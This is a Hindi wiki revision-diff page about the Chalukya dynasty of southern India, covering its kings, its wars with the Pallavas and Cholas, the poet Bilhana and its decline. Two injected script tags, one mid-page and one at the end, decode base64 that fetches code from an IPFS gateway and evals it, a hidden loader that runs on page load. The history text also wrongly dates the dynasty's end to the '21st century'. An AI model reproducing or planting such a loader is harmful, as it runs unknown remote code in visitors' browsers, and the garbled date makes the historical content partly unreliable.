"चालुक्य वंश" के अवतरणों में अंतर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
पंक्ति 4: पंक्ति 4:
 
इस वंश के नरेशों के नाम हैं—
 
इस वंश के नरेशों के नाम हैं—
 
*[[पुलकेशी प्रथम]] (550-66 ई.),  
 
*[[पुलकेशी प्रथम]] (550-66 ई.),  
*कीर्तिवर्मा प्रथम (लगभग 566 से 97 ई.),  
+
*[[कीर्तिवर्मा प्रथम]] (लगभग 566 से 97 ई.),  
*मंगलेश (लगभग 597-608),  
+
*[[मंगलेश]] (लगभग 597-608),  
 
*[[पुलकेशी द्वितीय]] (लगभग 609-42),  
 
*[[पुलकेशी द्वितीय]] (लगभग 609-42),  
 
*व्यवधान ( लगभग 642-55),  
 
*व्यवधान ( लगभग 642-55),  
*विक्रमादित्य प्रथम ( 655-80),  
+
*[[विक्रमादित्य प्रथम]] ( 655-80),  
*विनयादित्य (680-96),  
+
*[[विनयादित्य]] (680-96),  
*विजयादित्य (696-733),  
+
*[[विजयादित्य]] (696-733),  
*विक्रमादित्य द्वितीय (733-746), और  
+
*[[विक्रमादित्य द्वितीय]] (733-746), और  
*कीर्तिवर्मा द्वितीय (746-57)।
+
*[[कीर्तिवर्मा द्वितीय]] (746-57)।
  
 
==कुशल शासक==
 
==कुशल शासक==

12:01, 30 सितम्बर 2010 का अवतरण

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

चालुक्य वंश छठी शताब्दी ई. के मध्य दक्षिणी भारत में उत्कर्ष को प्राप्त था। इसके मूल के बारे में ठीक से कुछ पता नहीं है। चालुक्य नरेशों का दावा था कि वे चंद्रवशी राजपूत हैं और कभी अयोध्या पर शासन करते थे। गुर्जरों की एक शाखा चापस के एक अभिलेख में चालुक्य नरेश पुलकेशी के उल्लेख से कुछ आधुनिक इतिहासकारों ने यह अर्थ निकाला है कि चालुक्य, जो सोलंकी के नाम से विख्यात हैं, गुर्जरों से सम्बद्ध थे और राजपूताना से दक्षिण में आकर बसे थे। जो हो इतना तो निश्चित है कि चालुक्यों के नेता पुलकेशी प्रथम ने 550 ई. में एक राज्य की स्थापना की। जिसकी राजधानी वातापी थी। जो आज बीजापुर ज़िले में 'वातापी' के नाम से विख्यात है। पुलकेशी प्रथम ने अपने को दिग्विजयी राजा घोषित करने के लिए अश्वमेध यज्ञ भी किया। उसके वंश ने, जो वातापी के चालुक्य के नाम से प्रसिद्ध हैं, तेरह वर्षों के व्यवधान (642-655) को छोड़कर 550 से लेकर 757 ई. तक राज किया।

शासकों के नाम

इस वंश के नरेशों के नाम हैं—

कुशल शासक

शुरू के इन नौ चालुक्य नरेशों में चौथा पुलकेशी द्वितीय सबसे ज़्यादा प्रख्यात है। उसने 34 वर्ष (608-42) तक शासन किया। उसका राज्य विस्तार उत्तर में नर्मदा नदी से लेकर दक्षिण में कावेरी नदी तक हो गया। किन्तु 642 ई. में वह पल्लव नरेश नरसिंह वर्मा के द्वारा पराजित हुआ और शायद मारा गया। इसके बाद अगले तेरह सालों तक चालुक्य वंश पराभव को प्राप्त रहा। 655 ई. में पुलकेशी के पुत्र विक्रमादित्य प्रथम ने चालुक्य शक्ति फिर से प्रतिष्ठित की। पल्लवों के साथ चालुक्यों का संघर्ष जारी रहा और 740 ई. में चालुक्य नरेश विक्रमादित्य द्वितीय ने पल्लवों की राजधानी कांची पर अधिकार कर लिया। लेकिन उसके पुत्र और उत्तराधिकारी कीर्तिवर्मा द्वितीय को राष्ट्रकूटों के नेता दंतिदुर्ग ने 753 ई. में सिंहासन-च्युत कर दिया। चालुक्यों की शक्ति पर यह दूसरा ग्रहण था।

द्वितीय चालुक्य वंश

दो शताब्दियों के बाद चालुक्यवंश पुनः उत्कर्ष को प्राप्त हुआ जब तैल या तैलपने, जो अपने को वातापी के सातवें चालुक्य नरेश विजयादित्य का वंशज कहता था, 973 ई. में राष्ट्रकूट नरेश द्वितीय को परास्त कर दिया और कल्याणी को अपनी राजधानी बनाकर नये चालुक्य वंश की स्थापना की। यह नया वंश 973 से 1200 ई. तक सत्तासीन रहा और इसमें 12 राजा हुए।

नये शासकों के नाम

इनके नाम हैं—

आक्रमण

कल्याणी के इस चालुक्य राज्य का एक लम्बे अर्से तक तंजोर के चोलवंशी शासकों से संघर्ष चलता रहा। सत्याश्रय को चोल नरेश राजराज ने परास्त किया और चालुक्य राज्य को रौंद डाला। लेकिन सोमेश्वर प्रथम ने इस अपमान का बदला ने केवल चोल नरेश राजधिराज को कोप्पम के युद्ध में करारी हार देकर ले लिया वरन् इस युद्ध में उसने राजाधिराज का वंध कर दिया।

ग्रन्थ

सातवें नरेश विक्रमादित्य षष्ठ ने, जो विक्रम के नाम से भी विख्यात है, कांची पर अधिकार कर लिया और प्रसिद्ध कवि विल्हण को संरक्षत्व प्रदान किया। विल्हण ने विक्रमादित्य के जीवन पर 'विक्रमांक-चरित' नामक सुविख्यात ग्रंथ लिखा है। याज्ञवल्क्यस्मृति की 'मिताक्षरा' व्याख्या के लेखक प्रसिद्ध विधिवेत्ता विज्ञानेश्वर चालुक्यों की राजधानी कल्याणी में ही रहते थे। बंगाल को छोड़कर शेष भारत में 'मिताक्षरों' को हिन्दू क़ानून का सबसे अधिकारिक ग्रंथ माना जाता है।

पतन

विक्रमादित्य षष्ठ की मृत्यु के बाद से कल्याणी के चालुक्यों की शक्ति का पतन शुरू हो गया। ग्यारहवें राजा तैलप तृतीय के शासन काल में चालुक्य राज्य का अधिकांश भाग उसके प्रधान सेनापति बिज्जल कलचूरि ने हड़प लिया। चालुक्य राज्य शनै-शनै इतना कमज़ोर हो गया कि 21वीं शती में बारहवें राजा सोमेश्वर चतुर्थ का शासन समाप्त होने तक उसके राज्य का पश्चिमी भाग तो देवगिरि के यादवों ने छीन लिया और दक्षिणी भाग द्वारसमुद्र के होयसलों के नियंत्रण में आ गया। वातापी और कल्याणी चालुक्य नरेशों ने स्वयं कट्टर हिन्दू होने पर भी बौद्ध और जैन धर्म को प्रश्रय दिया। इनके शासन काल में यज्ञ-प्रधान हिन्दू धर्म पर विशेष बल दिया गया। चालुक्य राजाओं ने हिन्दू देवताओं के अनेक मन्दिरों का निर्माण कराया।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>